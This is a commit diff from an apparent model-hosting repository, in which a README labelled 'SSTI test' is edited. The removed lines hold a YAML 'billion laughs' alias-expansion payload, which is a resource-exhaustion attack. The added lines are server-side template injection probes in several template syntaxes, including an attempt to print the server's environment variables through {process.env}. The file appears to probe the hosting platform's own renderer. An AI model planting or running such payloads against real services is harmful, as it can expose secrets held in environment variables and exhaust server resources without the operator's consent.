FIRSTACCOUNT69 commited on
Commit
4d5ef37
·
verified ·
1 Parent(s): e053e31

SSTI test

Browse files
Files changed (1) hide show
  1. README.md +19 -9
README.md CHANGED
@@ -1,12 +1,22 @@
1
  ---
2
  license: mit
3
- custom: &anchor
4
- key1: value1
5
- key2: value2
6
- alias: *anchor
7
- billion_laughs: &a "LOL"
8
- a1: &b [*a,*a,*a,*a,*a]
9
- a2: &c [*b,*b,*b,*b,*b]
10
- a3: &d [*c,*c,*c,*c,*c]
11
  ---
12
- # Test
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  ---
2
  license: mit
 
 
 
 
 
 
 
 
3
  ---
4
+ # SSTI Test
5
+
6
+ {@html "<b>bold</b>"}
7
+
8
+ {2+2}
9
+
10
+ {process.env}
11
+
12
+ ${7*7}
13
+
14
+ {{7*7}}
15
+
16
+ <%= 7*7 %>
17
+
18
+ #{7*7}
19
+
20
+ ${{7*7}}
21
+
22
+ {#if true}visible{/if}